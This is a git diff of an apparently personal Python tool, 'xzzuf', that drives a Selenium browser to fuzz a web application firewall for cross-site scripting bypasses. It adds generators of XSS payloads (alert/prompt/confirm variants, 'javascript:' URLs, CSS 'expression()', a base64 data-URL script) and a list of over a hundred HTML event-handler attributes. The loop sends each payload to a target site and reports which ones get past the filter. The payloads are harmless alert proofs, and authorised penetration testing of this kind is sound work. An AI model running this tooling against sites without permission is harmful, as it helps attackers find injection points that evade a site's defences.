diff --git a/.gitignore b/.gitignore
index 3d53637..d840996 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
venv
-chromedriver*
\ No newline at end of file
+chromedriver*
+__pycache__/
diff --git a/language.py b/language.py
new file mode 100644
index 0000000..227ba14
--- /dev/null
+++ b/language.py
@@ -0,0 +1,47 @@
+from language_utils import gen_boolean, gen_color, gen_date, gen_email, gen_javascript, gen_number, gen_style, gen_text, gen_url
+
+
+class HTMLTag:
+ def __init__(self, name, self_closing=False):
+ self.name = name
+ self.self_closing = self_closing
+ self.attributes = []
+ self.children = []
+
+
+class HTMLTagAttributeType:
+ TypeText = 0
+ TypeBoolean = 1
+ TypeNumber = 2
+ TypeColor = 3
+ TypeJavascript = 4
+ TypeStlye = 5
+ TypeURL = 6
+ TypeEmail = 7
+ TypeDate = 8
+
+
+Generators = {
+ HTMLTagAttributeType.TypeText: gen_text,
+ HTMLTagAttributeType.TypeBoolean: gen_boolean,
+ HTMLTagAttributeType.TypeNumber: gen_number,
+ HTMLTagAttributeType.TypeColor: gen_color,
+ HTMLTagAttributeType.TypeJavascript: gen_javascript,
+ HTMLTagAttributeType.TypeStlye: gen_style,
+ HTMLTagAttributeType.TypeURL: gen_url,
+ HTMLTagAttributeType.TypeEmail: gen_email,
+ HTMLTagAttributeType.TypeDate: gen_date,
+}
+
+
+class HTMLAttribute:
+ def __init__(self, name, value_type):
+ self.name = name
+ self.kind = value_type
+ self.value = Generators[value_type]()
+
+ def __str__(self) -> str:
+ if not self.value:
+ return self.name
+ else:
+ return f'{self.name}="{self.value}"'
diff --git a/language_utils.py b/language_utils.py
new file mode 100644
index 0000000..3a8b899
--- /dev/null
+++ b/language_utils.py
@@ -0,0 +1,122 @@
+from random import randint
+
+
+def gen_text():
+ cases = {
+ 0: lambda: 'alert(0)',
+ 1: lambda: 'prompt\x600\x60',
+ 2: lambda: '"confirm\x600\x60"',
+ 3: lambda: 'window["alert"](0)',
+ 4: lambda: 'window["prompt"](0)',
+ 5: lambda: 'window["confirm"](0)',
+ 6: lambda: '"alert\x600\x60"',
+ 7: lambda: '"prompt\x600\x60"',
+ 8: lambda: '"alert(1)"',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_boolean():
+ cases = {
+ 0: lambda: 'true',
+ 1: lambda: 'false',
+ 2: lambda: '1',
+ 3: lambda: '0',
+ 4: lambda: 'null',
+ 5: lambda: 'undefined',
+ 6: lambda: '""',
+ 7: lambda: '[]',
+ 8: lambda: '{}',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_number():
+ cases = {
+ 0: lambda: '0',
+ 1: lambda: '1',
+ 2: lambda: '0.1',
+ 3: lambda: '1.1',
+ 4: lambda: '0x1',
+ 5: lambda: '0b1',
+ 6: lambda: '0o1',
+ 7: lambda: '1e1',
+ 8: lambda: '1e-1',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_color():
+ cases = {
+ 0: lambda: '#000000',
+ 1: lambda: '#ffffff',
+ 2: lambda: '#ff0000',
+ 3: lambda: '#00ff00',
+ 4: lambda: '#0000ff',
+ 5: lambda: '#ffff00',
+ 6: lambda: '#00ffff',
+ 7: lambda: '#ff00ff',
+ 8: lambda: '#c0c0c0',
+ }
+
+ return cases[randint(0, 8)]()
+
+
+def gen_javascript():
+ cases = {
+ 0: lambda: 'alert(0)',
+ 1: lambda: 'prompt\x600\x60',
+ 2: lambda: '"confirm\x600\x60"',
+ 3: lambda: 'window["alert"](0)',
+ 4: lambda: 'window["prompt"](0)',
+ 5: lambda: 'window["confirm"](0)',
+ 6: lambda: '"alert\x600\x60"',
+ 7: lambda: '"prompt\x600\x60"',
+ 8: lambda: '"alert(1)"',
+ 9: lambda: 'console.log(alert(1))//',
+ 10: lambda: 'console.log(alert(1))/*',
+ 11: lambda: '{1:alert(1)}',
+ }
+
+ return cases[randint(0, 11)]()
+
+
+def gen_style():
+ # xss via style
+ cases = {
+ 0: lambda: 'background-image:url("javascript:alert(1)")',
+ 1: lambda: 'expression(alert(1))',
+ 2: lambda: 'expression\x600\x60',
+ }
+
+ return cases[randint(0, 2)]()
+
+
+def gen_url():
+ # xss via url
+ cases = {
+ 0: lambda: 'javascript:alert(1)',
+ 1: lambda: 'data:text/html,',
+ 2: lambda: 'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
+ 3: lambda: 'data:text/html,',
+ }
+
+ return cases[randint(0, 3)]()
+
+
+def gen_email():
+ # xss via email
+ cases = {
+ 0: lambda: '@javascript:alert(1)',
+ 1: lambda: 'javascript:alert(1)@',
+ 2: lambda: '@javascript:alert\x600\x60',
+ }
+
+ return cases[randint(0, 3)]()
+
+
+def gen_date():
+ return ''
diff --git a/tags.py b/tags.py
new file mode 100644
index 0000000..0551872
--- /dev/null
+++ b/tags.py
@@ -0,0 +1,248 @@
+from language import HTMLAttribute, HTMLTag, HTMLTagAttributeType
+
+
+Tags = [
+ HTMLTag('a', self_closing=False),
+ HTMLTag('abbr', self_closing=False),
+ HTMLTag('acronym', self_closing=False),
+ HTMLTag('address', self_closing=False),
+ HTMLTag('applet', self_closing=False),
+ HTMLTag('area', self_closing=True),
+ HTMLTag('article', self_closing=False),
+ HTMLTag('aside', self_closing=False),
+ HTMLTag('audio', self_closing=False),
+ HTMLTag('b', self_closing=False),
+ HTMLTag('base', self_closing=True),
+ HTMLTag('basefont', self_closing=False),
+ HTMLTag('bdi', self_closing=False),
+ HTMLTag('bdo', self_closing=False),
+ HTMLTag('big', self_closing=False),
+ HTMLTag('blockquote', self_closing=False),
+ HTMLTag('body', self_closing=False),
+ HTMLTag('br', self_closing=True),
+ HTMLTag('button', self_closing=False),
+ HTMLTag('canvas', self_closing=False),
+ HTMLTag('caption', self_closing=False),
+ HTMLTag('center', self_closing=False),
+ HTMLTag('cite', self_closing=False),
+ HTMLTag('code', self_closing=False),
+ HTMLTag('col', self_closing=True),
+ HTMLTag('colgroup', self_closing=False),
+ HTMLTag('data', self_closing=False),
+ HTMLTag('datalist', self_closing=False),
+ HTMLTag('dd', self_closing=False),
+ HTMLTag('del', self_closing=False),
+ HTMLTag('details', self_closing=False),
+ HTMLTag('dfn', self_closing=False),
+ HTMLTag('dialog', self_closing=False),
+ HTMLTag('dir', self_closing=False),
+ HTMLTag('div', self_closing=False),
+ HTMLTag('dl', self_closing=False),
+ HTMLTag('dt', self_closing=False),
+ HTMLTag('em', self_closing=False),
+ HTMLTag('embed', self_closing=True),
+ HTMLTag('fieldset', self_closing=False),
+ HTMLTag('figcaption', self_closing=False),
+ HTMLTag('figure', self_closing=False),
+ HTMLTag('font', self_closing=False),
+ HTMLTag('footer', self_closing=False),
+ HTMLTag('form', self_closing=False),
+ HTMLTag('frame', self_closing=True),
+ HTMLTag('frameset', self_closing=False),
+ HTMLTag('h1', self_closing=False),
+ HTMLTag('h2', self_closing=False),
+ HTMLTag('h3', self_closing=False),
+ HTMLTag('h4', self_closing=False),
+ HTMLTag('h5', self_closing=False),
+ HTMLTag('h6', self_closing=False),
+ HTMLTag('head', self_closing=False),
+ HTMLTag('header', self_closing=False),
+ HTMLTag('hr', self_closing=True),
+ HTMLTag('html', self_closing=False),
+ HTMLTag('i', self_closing=False),
+ HTMLTag('iframe', self_closing=False),
+ HTMLTag('img', self_closing=True),
+ HTMLTag('input', self_closing=True),
+ HTMLTag('ins', self_closing=False),
+ HTMLTag('kbd', self_closing=False),
+ HTMLTag('label', self_closing=False),
+ HTMLTag('legend', self_closing=False),
+ HTMLTag('li', self_closing=False),
+ HTMLTag('link', self_closing=True),
+ HTMLTag('main', self_closing=False),
+ HTMLTag('map', self_closing=False),
+ HTMLTag('mark', self_closing=False),
+ HTMLTag('meta', self_closing=True),
+ HTMLTag('meter', self_closing=False),
+ HTMLTag('nav', self_closing=False),
+ HTMLTag('noframes', self_closing=False),
+ HTMLTag('noscript', self_closing=False),
+ HTMLTag('object', self_closing=False),
+ HTMLTag('ol', self_closing=False),
+ HTMLTag('optgroup', self_closing=False),
+ HTMLTag('option', self_closing=False),
+ HTMLTag('output', self_closing=False),
+ HTMLTag('p', self_closing=False),
+ HTMLTag('param', self_closing=True),
+ HTMLTag('picture', self_closing=False),
+ HTMLTag('pre', self_closing=False),
+ HTMLTag('progress', self_closing=False),
+ HTMLTag('q', self_closing=False),
+ HTMLTag('rp', self_closing=False),
+ HTMLTag('rt', self_closing=False),
+ HTMLTag('ruby', self_closing=False),
+ HTMLTag('s', self_closing=False),
+ HTMLTag('samp', self_closing=False),
+ HTMLTag('script', self_closing=False),
+ HTMLTag('section', self_closing=False),
+ HTMLTag('select', self_closing=False),
+ HTMLTag('small', self_closing=False),
+ HTMLTag('source', self_closing=True),
+ HTMLTag('span', self_closing=False),
+ HTMLTag('strike', self_closing=False),
+ HTMLTag('strong', self_closing=False),
+ HTMLTag('style', self_closing=False),
+ HTMLTag('sub', self_closing=False),
+ HTMLTag('summary', self_closing=False),
+ HTMLTag('sup', self_closing=False),
+ HTMLTag('svg', self_closing=False),
+ HTMLTag('table', self_closing=False),
+ HTMLTag('tbody', self_closing=False),
+ HTMLTag('td', self_closing=False),
+ HTMLTag('template', self_closing=False),
+ HTMLTag('textarea', self_closing=False),
+ HTMLTag('tfoot', self_closing=False),
+ HTMLTag('th', self_closing=False),
+ HTMLTag('thead', self_closing=False),
+ HTMLTag('time', self_closing=False),
+ HTMLTag('title', self_closing=False),
+ HTMLTag('tr', self_closing=False),
+ HTMLTag('track', self_closing=True),
+ HTMLTag('tt', self_closing=False),
+ HTMLTag('u', self_closing=False),
+ HTMLTag('ul', self_closing=False),
+ HTMLTag('var', self_closing=False),
+ HTMLTag('video', self_closing=False),
+ HTMLTag('wbr', self_closing=True),
+ HTMLTag('xmp', self_closing=False),
+]
+
+Attributes = [
+ # events
+ HTMLAttribute('onafterprint', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onafterscriptexecute', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationcancel', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationiteration', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onanimationstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onauxclick', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforecopy', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforecut', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforeinput', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforeprint', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforescriptexecute',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforetoggle', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbeforeunload', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbegin', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onblur', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onbounce', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncanplay', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncanplaythrough', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onclick', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onclose', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncontextmenu', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncopy', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncuechange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oncut', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondblclick', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondrag', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragenter', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragleave', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragover', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondragstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondrop', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ondurationchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onended', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onerror', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfinish', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfocus', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfocusin', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfocusout', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onfullscreenchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onhashchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oninput', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('oninvalid', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onkeydown', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onkeypress', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onkeyup', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onload', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onloadeddata', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onloadedmetadata', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmessage', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmousedown', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseenter', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseleave', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmousemove', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseout', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseover', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmouseup', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmousewheel', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onmozfullscreenchange',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpagehide', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpageshow', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpaste', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpause', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onplay', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onplaying', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerdown', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerenter', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerleave', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointermove', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerout', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerover', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerrawupdate', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpointerup', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onpopstate', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onprogress', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onratechange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onrepeat', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onreset', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onresize', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onscroll', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onscrollend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onsearch', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onseeked', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onseeking', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onselect', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onselectionchange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onselectstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onshow', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onsubmit', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontimeupdate', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontoggle', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontoggle(popover)', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontouchend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontouchmove', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontouchstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitioncancel', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitionend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitionrun', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('ontransitionstart', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onunhandledrejection', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onunload', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onvolumechange', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkitanimationend', HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkitanimationiteration',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkitanimationstart',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwebkittransitionend',
+ HTMLTagAttributeType.TypeJavascript),
+ HTMLAttribute('onwheel', HTMLTagAttributeType.TypeJavascript),
+]
diff --git a/xzzuf.py b/xzzuf.py
index d7d49a6..7b3773a 100644
--- a/xzzuf.py
+++ b/xzzuf.py
@@ -6,7 +6,11 @@ from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urlparse
from urllib.parse import urlencode
+from tags import Attributes
+
# WAFBypass class
+
+
class WAFBypass():
code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"
@@ -52,35 +56,27 @@ class WAFBypass():
self.driver.get(url)
self.wait_for_pageload()
- bypass = False
+ is403 = False
if self.is_403:
- bypass = False
+ is403 = True
else:
- bypass = True
+ is403 = False
- bypass = bypass and self.triggered_xss
+ triggerxss = self.triggered_xss
- return bypass
+ return (is403, triggerxss)
def run_fuzz(self):
- payloads = [
- "",
- "",
- "\u202e
",
- """<<\nscrip t="alert(0)""",
- ]
try:
- for i in range(0, 0x10FFFF):
- for p in payloads:
- encoded = urlencode(
- {"param2": p.replace("{FUZZ}", chr(i))})
- print("Trying payload: ", encoded, f"({hex(i)}/0xffff)")
- url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
- bypassed = self.navigate(url)
- if bypassed:
- print("Bypassed with payload: ", encoded)
- break
+ for attr in Attributes:
+ # print(f"[*] Testing {attr.name} attribute {attr}")
+ encoded = urlencode({"param2": f"{attr}"})
+ url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
+ # print(url)
+ is403, trigger = self.navigate(url)
+ if not is403:
+ print(f"[+] {attr.name} attribute is not filtered")
except KeyboardInterrupt:
self.driver.close()
exit(0)